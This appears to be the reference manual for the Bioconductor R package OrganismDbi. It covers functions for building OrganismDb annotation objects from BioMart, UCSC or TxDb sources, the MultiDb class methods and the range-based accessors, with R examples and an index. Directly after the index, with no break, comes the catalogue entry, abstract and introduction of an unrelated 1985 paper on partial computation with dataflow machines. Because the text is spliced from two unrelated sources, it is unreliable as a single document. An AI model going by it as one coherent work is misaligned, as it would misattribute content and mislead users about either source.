- `transcript_ids` optionally, only retrieve transcript annotation data for the specified set of transcript ids. If this is used, then the meta information displayed for the resulting TxDb object will say 'Full dataset: no'. Otherwise it will say 'Full dataset: yes'. This TxDb object will be embedded in the resulting OrganismDb object.
- `circ_seqs` a character vector to list out which chromosomes should be marked as circular.
- `filter` Additional filters to use in the BioMart query. Must be a named list. An example is `filter = as.list(c(source = "entrez"))`
- `port` The port to use in the HTTP communication with the host.
- `id_prefix` Specifies the prefix used in BioMart attributes. For example, some BioMarts may have an attribute specified as "ensembl_transcript_id" whereas others have the same attribute specified as "transcript_id". Defaults to "ensembl_".
- `miRBaseBuild` specify the string for the appropriate build information from mirbase.db to use for microRNAs. This can be learned by calling `supportedMiRBaseBuildValues`. By default, this value will be set to NA, which will inactivate the microRNAs accessor.
- `keytype` This indicates the kind of key that this database will use as a foreign key between its TxDb object and its OrgDb object: basically, whatever the column name is for the foreign key from your OrgDb that your TxDb will need to map its GENEID onto. By default it is "ENSEMBL", since the GENEIDs for most biomaRt based TxDb objects will be Ensembl gene ids and therefore they will need to map to ENSEMBL gene mappings from the associated OrgDb object.
- `orgdb` By default, `makeOrganismDbFromBiomart` will use the taxonomy ID from your txdb to look up an appropriate matching OrgDb object, but using this argument you can supply a different OrgDb object.
Details
makeOrganismDbFromBiomart is a convenience function that feeds data from a BioMart database to the lower level OrganismDb constructor. See ?makeOrganismDbFromUCSC for a similar function that feeds data from the UCSC source.
The listMarts function from the biomaRt package can be used to list all public BioMart databases. Not all databases returned by this function contain datasets that are compatible with (i.e. understood by) makeOrganismDbFromBiomart. Here is a list of datasets known to be compatible (updated on Sep 24, 2014):
- All the datasets in the main Ensembl database: use biomart="ensembl".
- All the datasets in the Ensembl Fungi database: use biomart="fungi_mart_XX" where XX is the release version of the database e.g. "fungi_mart_22".
- All the datasets in the Ensembl Metazoa database: use biomart="metazoa_mart_XX" where XX is the release version of the database e.g. "metazoa_mart_22".
- All the datasets in the Ensembl Plants database: use biomart="plants_mart_XX" where XX is the release version of the database e.g. "plants_mart_22".
- All the datasets in the Ensembl Protists database: use biomart="protists_mart_XX" where XX is the release version of the database e.g. "protists_mart_22".
- All the datasets in the Gramene Mart: use biomart="ENSEMBL_MART_PLANT".
Not all these datasets have CDS information.
Value
A OrganismDb object.
Author(s)
M. Carlson and H. Pages
See Also
- makeOrganismDbFromUCSC for convenient ways to make a OrganismDb object from UCSC online resources.
- The listMarts, useMart, and listDatasets functions in the biomaRt package.
- DEFAULT_CIRC_SEQS.
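A minimal usage sketch (an assumption of this edit, not part of the original page: it presumes the biomaRt and OrganismDbi packages are installed and www.ensembl.org is reachable) that first discovers available datasets and then builds the object:

```r
library(biomaRt)
## discover which datasets a mart offers before committing to one
mart <- useMart("ENSEMBL_MART_ENSEMBL", host = "www.ensembl.org")
head(listDatasets(mart))

library(OrganismDbi)
## build the OrganismDb (TxDb + OrgDb + GODb) for human Ensembl annotations
odb <- makeOrganismDbFromBiomart(biomart = "ENSEMBL_MART_ENSEMBL",
                                 dataset = "hsapiens_gene_ensembl")
columns(odb)
```

Building the full object downloads a complete transcript dataset, so expect this to take a few minutes on a live connection.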
makeOrganismDbFromTxDb
Make an OrganismDb object from an existing TxDb object.
Description
The makeOrganismDbFromTxDb function allows the user to make a OrganismDb object from an existing TxDb object.
Usage
makeOrganismDbFromTxDb(txdb, keytype=NA, orgdb=NA)
**Arguments**
- **txdb**: a TxDb object.
- **keytype**: By default, `makeOrganismDbFromTxDb` will try to guess this information based on the OrgDb object that is inferred to go with your TxDb object. But in some instances, you may need to supply an override, and that is what this argument is for. It is the column name of the ID type that your OrgDb will use as a foreign key when connecting to the data from the associated TxDb. So for example, if you looked at the Homo.sapiens package, the keytype for `org.Hs.eg.db` would be 'ENTREZID', because that is the kind of ID that matches up with its TxDb GENEID. (Because the GENEID for that specific TxDb is from UCSC and uses entrez gene IDs.)
- **orgdb**: By default, `makeOrganismDbFromTxDb` will use the taxonomy ID from your txdb to look up an appropriate matching OrgDb object, but using this argument you can supply a different OrgDb object.
**Details**
`makeOrganismDbFromTxDb` is a convenience function that processes a TxDb object and pairs it up with GO.db and an appropriate OrgDb object to make a OrganismDb object. See ?`makeOrganismDbFromBiomart` and ?`makeOrganismDbFromUCSC` for similar functions that feed data from either a BioMart database or UCSC.
**Value**
A OrganismDb object.
**Author(s)**
M. Carlson and H. Pages
**See Also**
- `makeOrganismDbFromBiomart` for convenient ways to make a OrganismDb object from BioMart online resources.
- The OrganismDb class.
**Examples**
```r
## lets start with a txdb object
library(GenomicFeatures)
transcript_ids <- c(
    "uc009uzf.1",
    "uc009uzg.1",
    "uc009uzh.1",
    "uc009uzi.1",
    "uc009uzj.1"
)
## build a TxDb restricted to those transcripts (as in the
## makeOrganismDbFromUCSC example)
txdbMouse <- makeTxDbFromUCSC(genome = "mm9", tablename = "knownGene",
                              transcript_ids = transcript_ids)
## Using that, we can call our function to promote it to an OrganismDb object:
odb <- makeOrganismDbFromTxDb(txdb = txdbMouse)
columns(odb)
```
makeOrganismDbFromUCSC
Make a OrganismDb object from annotations available at the UCSC Genome Browser
Description
The makeOrganismDbFromUCSC function allows the user to make a OrganismDb object from transcript annotations available at the UCSC Genome Browser.
Usage
```r
makeOrganismDbFromUCSC(
genome = "hg19",
tablename = "knownGene",
transcript_ids = NULL,
circ_seqs = DEFAULT_CIRC_SEQS,
url = "http://genome.ucsc.edu/cgi-bin/",
goldenPath_url = "http://hgdownload.cse.ucsc.edu/goldenPath",
miRBaseBuild = NA
)
```
Arguments
- `genome` genome abbreviation used by UCSC and obtained by `ucscGenomes()[, "db"]`. For example: "hg19".
- `tablename` name of the UCSC table containing the transcript annotations to retrieve. Use the `supportedUCSCtables` utility function to get the list of supported tables. Note that not all tables are available for all genomes.
- `transcript_ids` optionally, only retrieve transcript annotation data for the specified set of transcript ids. If this is used, then the meta information displayed for the resulting OrganismDb object will say 'Full dataset: no'. Otherwise it will say 'Full dataset: yes'.
- `circ_seqs` a character vector to list out which chromosomes should be marked as circular.
- `url`, `goldenPath_url` used to specify the location of an alternate UCSC Genome Browser.
- `miRBaseBuild` specify the string for the appropriate build Information from mirbase.db to use for microRNAs. This can be learned by calling `supportedMiRBaseBuildValues`. By default, this value will be set to NA, which will inactivate the microRNAs accessor.
Details
makeOrganismDbFromUCSC is a convenience function that feeds data from the UCSC source to the lower level OrganismDb function. See `?makeOrganismDbFromBiomart` for a similar function that feeds data from a BioMart database.
Value
A OrganismDb object.
Author(s)
M. Carlson and H. Pages
See Also
- `makeOrganismDbFromBiomart` for convenient ways to make a `OrganismDb` object from BioMart online resources.
- `ucscGenomes` in the `rtracklayer` package.
- `DEFAULT_CIRC_SEQS`.
- The `supportedMiRBaseBuildValues` function for listing all the possible values for the `miRBaseBuild` argument.
- The `OrganismDb` class.
Examples
```r
## Display the list of genomes available at UCSC:
library(rtracklayer)
ucscGenomes()[, "db"]
## Display the list of tables supported by makeOrganismDbFromUCSC():
supportedUCSCtables()
## Not run:
## Retrieving a full transcript dataset for Yeast from UCSC:
odb1 <- makeOrganismDbFromUCSC(genome="sacCer2", tablename="ensGene")
## End(Not run)
## Retrieving an incomplete transcript dataset for Mouse from UCSC
## (only transcripts linked to Entrez Gene ID 22290):
transcript_ids <- c(
"uc009uzf.1",
"uc009uzg.1",
"uc009uzh.1",
"uc009uzi.1",
"uc009uzj.1"
)
odb2 <- makeOrganismDbFromUCSC(genome="mm9", tablename="knownGene",
transcript_ids=transcript_ids)
odb2
```
makeOrganismPackage

Description

`makeOrganismPackage` is a method that generates a package that will load an appropriate OrganismDb object, which will in turn point to existing annotation packages.
Usage
```
makeOrganismPackage(pkgname, graphData, organism, version,
                    maintainer, author, destDir,
                    license = "Artistic-2.0")
```
Arguments
- **pkgname**: What is the desired package name. Traditionally, this should be the genus and species separated by a ".". So as an example, "Homo.sapiens" would be the package name for human.
- **graphData**: A list of short character vectors. Each character vector in the list is exactly two elements long and represents a join relationship between two packages. The names of these character vectors are the package names and the values are the foreign keys that should be used to connect each package. All foreign keys must be values that can be returned by the columns method for each package in question, and obviously they also must be the same kind of identifier as well.
- **organism**: The name of the organism this package represents.
- **version**: What is the version number for this package?
- **maintainer**: Who is the package maintainer? (must include email to be valid)
- **author**: Who is the creator of this package?
- **destDir**: A path where the package source should be assembled.
- **license**: What is the license (and its version)?
Details
The purpose of this method is to create a special package that will depend on existing annotation packages and which will load a special OrganismDb object that will allow proper dispatch of special select methods. These methods will allow the user to easily query across multiple annotation resources via information contained by the OrganismDb object. Because the end result will be a package that treats all the data mapped together as a single source, the user is encouraged to take extra care to ensure that the different packages used are from the same build etc.
Value
A special package to load an `OrganismDb` object.
Author(s)
M. Carlson
See Also
`OrganismDb`
Examples
```r
## set up the list with the relevant relationships:
gd <- list(join1 = c(GO.db="GOID", org.Hs.eg.db="GO"),
           join2 = c(org.Hs.eg.db="ENTREZID",
                     TxDb.Hsapiens.UCSC.hg19.knownGene="GENEID"))
## sets up a temporary directory for this example
## (users won’t need to do this step)
destination <- tempfile()
dir.create(destination)
## makes an Organism package for human called Homo.sapiens
if(interactive()){
  makeOrganismPackage(pkgname = "Homo.sapiens",
                      graphData = gd,
                      organism = "Homo sapiens",
                      version = "1.0.0",
                      maintainer = "Bioconductor Package Maintainer <maintainer@bioconductor.org>",
                      author = "Bioconductor Core Team",
                      destDir = destination,
                      license = "Artistic-2.0")
}
```
---
mapToTranscripts
*Map range coordinates between transcripts and genome space*
Description
Map range coordinates between features in the transcriptome and genome (reference) space.
See `?mapToAlignments` in the `GenomicAlignments` package for mapping coordinates between reads (local) and genome (reference) space using a CIGAR alignment.
Usage
```r
## S4 method for signature ‘ANY,MultiDb’
mapToTranscripts(x, transcripts, ignore.strand = TRUE,
                 extractor.fun = GenomicFeatures::transcripts, ...)
```
Arguments
- `x` A GRanges object of positions to be mapped. `x` must have names when mapping to the genome.
- `transcripts` The OrganismDb object that will be used to extract features using the `extractor.fun`.
- `ignore.strand` When `TRUE`, strand is ignored in overlap operations.
- `extractor.fun` Function to extract genomic features from a TxDb object. Valid extractor functions:
  - `transcripts` (default)
  - `exons`
  - `cds`
  - `genes`
  - `promoters`
  - `disjointExons`
  - `microRNAs`
  - `tRNAs`
  - `transcriptsBy`
  - `exonsBy`
  - `cdsBy`
  - `intronsByTranscript`
  - `fiveUTRsByTranscript`
  - `threeUTRsByTranscript`
- `...` Additional arguments passed to `extractor.fun` functions.
Details
- `mapToTranscripts` The genomic range in `x` is mapped to the local position in the `transcripts` ranges. A successful mapping occurs when `x` is completely within the `transcripts` range, equivalent to `findOverlaps(..., type="within")`.
  Transcriptome-based coordinates start counting at 1 at the beginning of the `transcripts` range and return positions where `x` was aligned. The seqlevels of the return object are taken from the `transcripts` object and should be transcript names. In this direction, mapping is attempted between all elements of `x` and all elements of `transcripts`.
Value
An object the same class as `x`.

Parallel methods return an object the same shape as `x`. Ranges that cannot be mapped (out of bounds or strand mismatch) are returned as zero-width ranges starting at 0 with a seqname of "UNMAPPED".

Non-parallel methods return an object that varies in length, similar to a Hits object. The result only contains mapped records; strand mismatch and out of bound ranges are not returned. The xHits and transcriptsHits metadata columns indicate the elements of `x` and `transcripts` used in the mapping.

When present, names from `x` are propagated to the output. When mapping to transcript coordinates, seqlevels of the output are the names on the `transcripts` object; most often these will be transcript names. When mapping to the genome, seqlevels of the output are the seqlevels of `transcripts`, which are usually chromosome names.
Author(s)
V. Obenchain, M. Lawrence and H. Pages; ported to work with OrganismDbi by Marc Carlson
See Also
- mapToTranscripts.
Examples

```r
library(Homo.sapiens)
x <- GRanges("chr5",
             IRanges(c(173315331, 174151575), width = 400,
                     names = LETTERS[1:2]))
## Map to transcript coordinates:
mapToTranscripts(x, Homo.sapiens)
```
MultiDb-class

Description
The OrganismDb class is a container for storing knowledge about existing Annotation packages and the relationships between these resources. The purpose of this object and its associated methods is to provide a means by which users can conveniently query for data from several different annotation resources at the same time using a familiar interface.
The supporting methods `select`, `columns` and `keys` are used together to extract data from an `OrganismDb` object in a manner that should be consistent with how these are used on the supporting annotation resources.
The family of `seqinfo` style getters (`seqinfo`, `seqlevels`, `seqlengths`, `isCircular`, `genome`, and `seqnameStyle`) is also supported for `OrganismDb` objects provided that the object in question has an embedded `TxDb` object.
Methods
In the code snippets below, `x` is a `OrganismDb` object.
- `keytypes(x)` allows the user to discover which keytypes can be passed in to `select` or `keys` and the `keytype` argument.
- `keys(x, keytype, pattern, column, fuzzy)` returns keys for the database contained in the `TxDb` object.
The `keytype` argument specifies the kind of keys that will be returned and is always required. If `keys` is used with `pattern`, it will pattern match on the `keytype`.
But if the `column` argument is also provided along with the `pattern` argument, then `pattern` will be matched against the values in `column` instead.
If `keys` is called with `column` and no `pattern` argument, then it will return all keys that have corresponding values in the `column` argument.
Thus, the behavior of `keys` all depends on how many arguments are specified.
Use of the `fuzzy` argument will toggle `fuzzy` matching to `TRUE` or `FALSE`. If `pattern` is not used, `fuzzy` is ignored.
- `columns(x)` shows which kinds of data can be returned for the `OrganismDb` object.
select(x, keys, columns, keytype): When all the appropriate arguments are specified, `select` will retrieve the matching data as a dataframe based on parameters for selected keys and columns and keytype arguments.
mapIds(x, keys, columns, keytype, ..., multiVals): When all the appropriate arguments are specified, `mapIds` will retrieve the matching data as a vector or list based on parameters for selected keys and columns and keytype arguments. The `multiVals` argument can be used to choose the format of the values returned. Possible values for `multiVals` are:
- **first**: This value means that when there are multiple matches only the 1st thing that comes back will be returned. This is the default behavior
- **list**: This will just return a list object to the end user
- **filter**: This will remove all elements that contain multiple matches and will therefore return a shorter vector than what came in whenever some of the keys match more than one value
- **asNA**: This will return an NA value whenever there are multiple matches
- **CharacterList**: This just returns a SimpleCharacterList object
- **FUN**: You can also supply a function to the `multiVals` argument for custom behaviors. The function must take a single argument and return a single value. This function will be applied to all the elements and will serve a ‘rule’ that for which thing to keep when there is more than one element. So for example this example function will always grab the last element in each result: `last <- function(x){x[[length(x)]]}`
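As a sketch of the **FUN** option (assuming the Homo.sapiens package is installed), the `last` rule above can be plugged straight into `mapIds`:

```r
library(Homo.sapiens)
## custom rule: keep only the last match for each key
last <- function(x){ x[[length(x)]] }
k <- head(keys(org.Hs.eg.db, "ENTREZID"))
mapIds(Homo.sapiens, keys = k, column = "ALIAS",
       keytype = "ENTREZID", multiVals = last)
```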
selectByRanges(x, ranges, columns, overlaps, ignore.strand): When all the appropriate arguments are specified, `selectByRanges` will return an annotated GRanges object that has been generated based on what you passed in to the ranges argument and whether that overlapped with what you specified in the overlaps argument. Internally this function will get annotation features and overlaps by calling the appropriate annotation methods indicated by the overlaps argument. The value for overlaps can be any of: gene, tx, exons, cds, 5utr, introns or 3utr. The default value is 'tx', which will return your annotated ranges based on whether they overlapped with the transcript ranges of any gene in the associated TxDb object, based on the gene models it contains. Also: the number of ranges returned to you will match the number of genes that your ranges argument overlapped for the type of overlap that you specified. So if some of your ranges are large and overlap several features, then you will get many duplicated ranges returned, with one for each gene that has an overlapping feature. The columns values that you request will be returned in the mcols for the annotated GRanges object that is the return value for this function. Finally, the ignore.strand argument is provided to indicate whether or not findOverlaps should ignore or respect the strand.
selectRangesById(x, keys, columns, keytype, feature): When all the appropriate arguments are specified, `selectRangesById` will return a GRangesList object that correspond to gene models GRanges for the keys that you specify with the keys and keytype arguments. The annotation ranges retrieved for this will be specified by the feature argument and can be: gene, tx, exon or cds. The default is 'tx' which will return the transcript ranges for each gene as a GRanges object in the list. Extra data can also be returned in the mcols values for those GRanges by using the columns argument.
resources(x): shows where the db files are for resources that are used to store the data for the OrganismDb object.
TxDb(x): Accessor for the TxDb object of a OrganismDb object.
TxDb(x) <- value: Allows you to swap in an alternative TxDb for a given OrganismDb object. This is most often useful when combined with saveDb(TxDb, file), which returns the saved TxDb, so that you can save a TxDb to disk and then assign the saved version right into your OrganismDb object.
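A sketch of the save-and-swap pattern just described (assuming the Homo.sapiens package is installed; the temporary file name is arbitrary):

```r
library(Homo.sapiens)
## save the embedded TxDb to disk, then assign the saved copy back in
f <- tempfile(fileext = ".sqlite")
TxDb(Homo.sapiens) <- saveDb(TxDb(Homo.sapiens), file = f)
## the resources listing now points at the on-disk copy
resources(Homo.sapiens)
```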
Author(s)
Marc Carlson
See Also
- AnnotationDb-class for more description of methods select, keytypes, keys and columns.
- makeOrganismPackage for functions used to generate an OrganismDb based package.
- rangeBasedAccessors for the range based methods used in extracting data from a OrganismDb object.
- seqlevels
- seqlengths
- isCircular
- genome
Examples
```r
## load a package that creates an OrganismDb
library(Homo.sapiens)
ls(2)
## then the methods can be used on this object.
columns <- columns(Homo.sapiens)[c(7,10,11,12)]
keys <- head(keys(org.Hs.eg.db, "ENTREZID"))
keytype <- "ENTREZID"
res <- select(Homo.sapiens, keys, columns, keytype)
head(res)
res <- mapIds(Homo.sapiens, keys=c("Var1", "Var10"), column="ALIAS",
keytype="ENTREZID", multiVals="CharacterList")
## get symbols for ranges in question:
ranges <- GRanges(seqnames=Rle(c("chr11"), c(2)),
IRanges(start=c(107899550, 108025550),
end=c(108291889, 108050000)), strand="*",
seqinfo=seqinfo(Homo.sapiens))
selectByRanges(Homo.sapiens, ranges, "SYMBOL")
## Or extract the gene model for the 'A1BG' gene:
selectRangesById(Homo.sapiens, 'A1BG', keytype='SYMBOL')
## Get the DB connections or DB file paths associated with those for
## each.
dbconn(Homo.sapiens)
dbfile(Homo.sapiens)
## extract the taxonomyId
taxonomyId(Homo.sapiens)
## extract the resources
resources(Homo.sapiens)
```
rangeBasedAccessors

*Extract genomic features from an object*
Description
Generic functions to extract genomic features from an object. This page documents the methods for OrganismDb objects only.
Usage
```r
## S4 method for signature 'MultiDb'
transcripts(x, columns=c("TXID", "TXNAME"), filter=NULL)
## S4 method for signature 'MultiDb'
exons(x, columns="EXONID", filter=NULL)
## S4 method for signature 'MultiDb'
cds(x, columns="CDSID", filter=NULL)
## S4 method for signature 'MultiDb'
genes(x, columns="GENEID", filter=NULL)
## S4 method for signature 'MultiDb'
transcriptsBy(x, by, columns, use.names=FALSE,
outerMcols=FALSE)
## S4 method for signature 'MultiDb'
exonsBy(x, by, columns, use.names=FALSE, outerMcols=FALSE)
## S4 method for signature 'MultiDb'
cdsBy(x, by, columns, use.names=FALSE, outerMcols=FALSE)
## S4 method for signature 'MultiDb'
getTxDbIfAvailable(x, ...)
## S4 method for signature 'MultiDb'
asBED(x)
## S4 method for signature 'MultiDb'
asGFF(x)
## S4 method for signature 'MultiDb'
disjointExons(x, aggregateGenes=FALSE,
includeTranscripts=TRUE, ...)
## S4 method for signature 'MultiDb'
microRNAs(x)
## S4 method for signature 'MultiDb'
tRNAs(x)
## S4 method for signature 'MultiDb'
promoters(x, upstream=2000, downstream=200, ...)
```
```r
## S4 method for signature 'GenomicRanges,MultiDb'
distance(x, y, ignore.strand=FALSE, ..., id,
         type=c("gene", "tx", "exon", "cds"))
## S4 method for signature 'BSgenome'
extractTranscriptSeqs(x, transcripts, strand = "+")
## S4 method for signature 'MultiDb'
extractUpstreamSeqs(x, genes, width=1000, exclude.seqlevels=NULL)
## S4 method for signature 'MultiDb'
intronsByTranscript(x, use.names=FALSE)
## S4 method for signature 'MultiDb'
fiveUTRsByTranscript(x, use.names=FALSE)
## S4 method for signature 'MultiDb'
threeUTRsByTranscript(x, use.names=FALSE)
## S4 method for signature 'MultiDb'
isActiveSeq(x)
```
Arguments
- `x` A MultiDb object, except for the `extractTranscriptSeqs` method; in that case `x` is a BSgenome object and the second argument is a MultiDb object.
- `...` Arguments to be passed to or from methods.
- `by` One of "gene", "exon", "cds" or "tx". Determines the grouping.
- `columns` The columns or kinds of metadata that can be retrieved from the database. All possible columns are returned by using the `columns` method.
- `filter` Either NULL or a named list of vectors to be used to restrict the output. Valid names for this list are: "gene_id", "tx_id", "tx_name", "tx_chrom", "tx_strand", "exon_id", "exon_name", "exon_chrom", "exon_strand", "cds_id", "cds_name", "cds_chrom", "cds_strand" and "exon_rank".
- `use.names` Controls how to set the names of the returned GRangesList object. These functions return all the features of a given type (e.g. all the exons) grouped by another feature type (e.g. grouped by transcript) in a GRangesList object. By default (i.e. if `use.names` is FALSE), the names of this GRangesList object (aka the group names) are the internal ids of the features used for grouping (aka the grouping features), which are guaranteed to be unique. If `use.names` is TRUE, then the names of the grouping features are used instead of their internal ids. For example, when grouping by transcript (`by="tx"`), the default group names are the transcript internal ids ("tx_id"). But, if `use.names=TRUE`, the group names are the transcript names ("tx_name"). Note that, unlike the feature ids, the feature names are not guaranteed to be unique or even defined (they could be all NAs). A warning is issued when this happens. See `?id2name` for more information about feature internal ids and feature external names and how to map the former to the latter.
  Finally, `use.names=TRUE` cannot be used when grouping by gene (`by="gene"`). This is because, unlike for the other features, the gene ids are external ids (e.g. Entrez Gene or Ensembl ids), so the db doesn't have a "gene_name" column for storing alternate gene names.
- `upstream` For `promoters`: an integer(1) value indicating the number of bases upstream from the transcription start site. For additional details see `?"promoters,GRanges-method"`.
- `downstream` For `promoters`: an integer(1) value indicating the number of bases downstream from the transcription start site. For additional details see `?"promoters,GRanges-method"`.
- `aggregateGenes` For `disjointExons`: a logical. When `FALSE` (default), exon fragments that overlap multiple genes are dropped. When `TRUE`, all fragments are kept and the gene_id metadata column includes all gene ids that overlap the exon fragment.
- `includeTranscripts` For `disjointExons`: a logical. When `TRUE` (default), a tx_name metadata column is included that lists all transcript names that overlap the exon fragment.
- `y` For `distance`, a MultiDb instance. The `id` is used to extract ranges from the MultiDb, which are then used to compute the distance from `x`.
- `id` A character vector the same length as `x`. The `id` values must be identifiers in the MultiDb object; `type` indicates what type of identifier `id` is.
- `type` A character(1) describing the `id`. Must be one of 'gene', 'tx', 'exon' or 'cds'.
- `ignore.strand` A logical indicating if the strand of the ranges should be ignored. When `TRUE`, strand is set to '+'.
- `outerMcols` A logical indicating if the 'outer' mcols (metadata columns) should be populated for some range based accessors which return a GRangesList object. By default this is `FALSE`, but if `TRUE` then the outer list object will also have its metadata columns populated, as well as the mcols for the 'inner' GRanges objects.
- `transcripts` An object representing the exon ranges of each transcript to extract. It must be a GRangesList or MultiDb object while `x` is a BSgenome object. Internally, it is turned into a GRangesList object with `exonsBy(transcripts, by="tx", use.names=TRUE)`.
- `strand` Only supported when `x` is a DNAString object.
  `strand` can be an atomic vector, a factor, or an Rle object, in which case it indicates the strand of each transcript (i.e. all the exons in a transcript are considered to be on the same strand). More precisely: it is turned into a factor (or factor-Rle) that has the "standard strand levels" (this is done by calling the `strand` function on it). Then it is recycled to the length of the RangesList object `transcripts` if needed. In the resulting object, the i-th element is interpreted as the strand of all the exons in the i-th transcript.
  `strand` can also be a list-like object, in which case it indicates the strand of each exon, individually. Thus it must have the same shape as the RangesList object `transcripts` (i.e. same length, plus `strand[[i]]` must have the same length as `transcripts[[i]]` for all i).
  `strand` can only contain "+" and/or "-" values. "*" is not allowed.
genes
An object containing the locations (i.e. chromosome name, start, end, and strand) of the genes or transcripts with respect to the reference genome. Only GenomicRanges and MultiDb objects are supported at the moment. If the latter, the gene locations are obtained by calling the genes function on the MultiDb object internally.
width
How many bases to extract upstream of each TSS (transcription start site).
exclude.seqlevels
A character vector containing the chromosome names (a.k.a. sequence levels) to exclude when the genes are obtained from a MultiDb object.
Details
These are the range based functions for extracting transcript information from a MultiDb object.
Value
A GRanges or GRangesList object.
Author(s)
M. Carlson
See Also
• MultiDb-class for how to use the simple "select" interface to extract information from a MultiDb object.
• transcripts for the original transcripts method and related methods.
• transcriptsBy for the original transcriptsBy method and related methods.
Examples
```r
## extracting all transcripts from Homo.sapiens with some extra metadata
library(Homo.sapiens)
cols = c("TXNAME","SYMBOL")
res <- transcripts(Homo.sapiens, columns=cols)
## extracting all transcripts from Homo.sapiens, grouped by gene and
## with extra metadata
res <- transcriptsBy(Homo.sapiens, by="gene", columns=cols)
## list possible values for columns argument:
columns(Homo.sapiens)
## Get the TxDb from an MultiDb object (if it's available)
getTxDbIfAvailable(Homo.sapiens)
## Other functions listed above should work in way similar to their TxDb
## counterparts. So for example:
promoters(Homo.sapiens)
## Should give the same value as:
promoters(getTxDbIfAvailable(Homo.sapiens))
```
Index
*Topic methods
mapToTranscripts, 9
rangeBasedAccessors, 14
*Topic utilities
mapToTranscripts, 9
AnnotationDb-class, 13
asBED, MultiDb-method
(rangeBasedAccessors), 14
asGFF, MultiDb-method
(rangeBasedAccessors), 14
BSgenome, 15, 16
cds, MultiDb-method
(rangeBasedAccessors), 14
cdsBy, MultiDb-method
(rangeBasedAccessors), 14
class: MultiDb (MultiDb-class), 11
class: OrganismDb (MultiDb-class), 11
columns, MultiDb-method (MultiDb-class), 11
dbconn, MultiDb-method (MultiDb-class), 11
dbfile, MultiDb-method (MultiDb-class), 11
DEFAULT_CIRC_SEQS, 3, 7
disjointExons, MultiDb-method
(rangeBasedAccessors), 14
distance, GenomicRanges, MultiDb-method
(rangeBasedAccessors), 14
DNAString, 16
exons, MultiDb-method
(rangeBasedAccessors), 14
exonsBy, 16
exonsBy, MultiDb-method
(rangeBasedAccessors), 14
extractTranscriptSeqs, BSgenome-method
(rangeBasedAccessors), 14
extractUpstreamSeqs, MultiDb-method
(rangeBasedAccessors), 14
fiveUTRsByTranscript, MultiDb-method
(rangeBasedAccessors), 14
genes, 16
genes, MultiDb-method
(rangeBasedAccessors), 14
genome, 13
GenomicRanges, 16
getTxDbIfAvailable
(rangeBasedAccessors), 14
getTxDbIfAvailable, MultiDb-method
(rangeBasedAccessors), 14
GRangesList, 15, 16
id2name, 15
intronsByTranscript, MultiDb-method
(rangeBasedAccessors), 14
isActiveSeq, MultiDb-method
(rangeBasedAccessors), 14
isActiveSeq<-, MultiDb-method
(rangeBasedAccessors), 14
isCircular, 13
keys, MultiDb-method (MultiDb-class), 11
keytypes, MultiDb-method
(MultiDb-class), 11
listDatasets, 3
listMarts, 2, 3
makeOrganismDbFromBiomart, 2, 5–7
makeOrganismDbFromTxDb, 4
makeOrganismDbFromUCSC, 3, 5, 6
makeOrganismPackage, 7, 13
mapIds, MultiDb-method (MultiDb-class), 11
mapToAlignments, 9
mapToTranscripts, 9, 10
mapToTranscripts, ANY, MultiDb-method
(mapToTranscripts), 9
metadata, MultiDb-method
(MultiDb-class), 11
microRNAs, MultiDb-method
(rangeBasedAccessors), 14
MultiDb, 15–17
MultiDb (MultiDb-class), 11
MultiDb-class, 11, 17
OrganismDb, 2–8, 14
OrganismDb (MultiDb-class), 11
OrganismDb-class (MultiDb-class), 11
promoters, MultiDb-method
(rangeBasedAccessors), 14
rangeBasedAccessors, 13, 14
RangesList, 16
resources (MultiDb-class), 11
resources, MultiDb-method
(MultiDb-class), 11
Rle, 16
select, MultiDb-method (MultiDb-class), 11
selectByRanges (MultiDb-class), 11
selectByRanges, MultiDb-method
(MultiDb-class), 11
selectRangesById (MultiDb-class), 11
selectRangesById, MultiDb-method
(MultiDb-class), 11
seqinfo, MultiDb-method (MultiDb-class), 11
seqlengths, 13
seqlevels, 13
strand, 16
supportedMiRBaseBuildValues, 4, 7
taxonomyId, MultiDb-method
(MultiDb-class), 11
threeUTRsByTranscript, MultiDb-method
(rangeBasedAccessors), 14
transcripts, 17
transcripts, MultiDb-method
(rangeBasedAccessors), 14
transcriptsBy, 17
transcriptsBy, MultiDb-method
(rangeBasedAccessors), 14
tRNAs, MultiDb-method
(rangeBasedAccessors), 14
TxDb, 2, 11
TxDb (MultiDb-class), 11
TxDb, OrganismDb-method (MultiDb-class), 11
TxDb<- (MultiDb-class), 11
TxDb<-, OrganismDb-method
(MultiDb-class), 11
ucscGenomes, 6, 7
useMart, 3
<table>
<thead>
<tr>
<th>Title</th>
<th>Non-Strict Partial Computation with a Dataflow Machine (Software Science and Engineering)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Author(s)</td>
<td>ONO, Satoshi; TAKAHASHI, Naohisa; AMAMIYA, Makoto</td>
</tr>
<tr>
<td>Citation</td>
<td>数理解析研究所講究録 547: 196-229</td>
</tr>
<tr>
<td>Issue Date</td>
<td>1985-01</td>
</tr>
<tr>
<td>URL</td>
<td><a href="http://hdl.handle.net/2433/98839">http://hdl.handle.net/2433/98839</a></td>
</tr>
<tr>
<td>Right</td>
<td></td>
</tr>
<tr>
<td>Type</td>
<td>Departmental Bulletin Paper</td>
</tr>
<tr>
<td>Textversion</td>
<td>publisher</td>
</tr>
</tbody>
</table>
Non-Strict Partial Computation with a Dataflow Machine
Satoshi ONO, Naohisa TAKAHASHI and Makoto AMAMIYA
Musashino Electrical Communication Laboratory
Nippon Telegraph and Telephone Public Corporation
3-9-11 Midoricho Musashino-shi Tokyo 180 Japan
Abstract
This paper proposes a new partial computation method for functional programming languages, named the projected function method. This method makes it possible to execute general partial computation without the pre-binding capability. Pre-binding is essential to the partial computation of non-strict functions in the conventional method, but is quite difficult to implement in dataflow machines.
This paper also presents a new concept named a Dependency Property Set (DPS). The DPS indicates the dependency relation between parameters of functions and result values. This concept plays an important role in the projected function method. An algorithm to compute DPSs based on data flow analysis is also shown.
The projected function method has an excellent conformity with the dataflow computation model. Therefore, this method offers promises for realizing highly-parallel and highly-effective functional programming machines.
Index terms: Functional programming, tabulation, dataflow analysis, dependency analysis, reduction, normalization
1. Introduction
Partial computation is customizing a general program into a more efficient program based upon its operating environment [1]. This concept is useful for pattern matching, syntax analysis, compiler generation and so on [1]. Functional programming languages [2] have clean mathematical semantics, and are especially suitable for automated partial computation. A partial computation algorithm has been discussed for the class of recursive program schemata [3], and attempts have been made to develop partial computation programs for LISP language [4,5].
